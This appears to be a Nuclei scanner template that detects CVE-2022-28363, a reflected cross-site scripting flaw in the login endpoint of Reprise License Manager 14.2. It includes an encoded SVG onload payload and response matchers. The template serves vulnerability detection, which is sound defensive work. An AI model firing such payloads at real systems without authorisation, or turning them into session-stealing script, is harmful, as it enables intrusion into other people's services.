54 lines
1.8 KiB
YAML
54 lines
1.8 KiB
YAML
id: CVE-2022-28363
|
|
|
|
info:
|
|
name: Reprise License Manager 14.2 - Cross-Site Scripting
|
|
author: Akincibor
|
|
severity: medium
|
|
description: |
|
|
Reprise License Manager 14.2 contains a reflected cross-site scripting vulnerability in the /goform/login_process 'username' parameter via GET, whereby no authentication is required.
|
|
remediation: |
|
|
Upgrade to a patched version of Reprise License Manager or apply the vendor-supplied patch to mitigate this vulnerability.
|
|
reference:
|
|
- https://www.reprisesoftware.com/products/software-license-management.php
|
|
- https://github.com/advisories/GHSA-rpvc-qgrm-r54f
|
|
- http://packetstormsecurity.com/files/166647/Reprise-License-Manager-14.2-Cross-Site-Scripting-Information-Disclosure.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-28363
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-28363
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00237
|
|
epss-percentile: 0.61669
|
|
cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: reprisesoftware
|
|
product: reprise_license_manager
|
|
tags: xss,rlm,packetstorm,cve,cve2022
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '<svg/onload=alert(document.domain)>'
|
|
- 'Login Failed'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4b0a0048304602210081df6b0159d9ce7a06db833745db0711bf1e4680baff07b158926d813a05117b02210084e837a4d28fab38b96409112e32476a8400e194d2c834bf91d235406a7d3d7c:922c64590222798bb761d5b6d8e72950
|